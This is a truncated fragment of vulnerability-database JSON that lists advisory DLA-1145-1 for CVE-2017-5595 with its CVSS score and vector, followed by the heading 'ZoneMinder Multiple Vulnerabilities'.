"obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5595"], "modified": "2022-08-05T05:18:00", "id": "OSV:DLA-1145-1", "href": "https://osv.dev/vulnerability/DLA-1145-1", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}]}
ZoneMinder Multiple Vulnerabilities
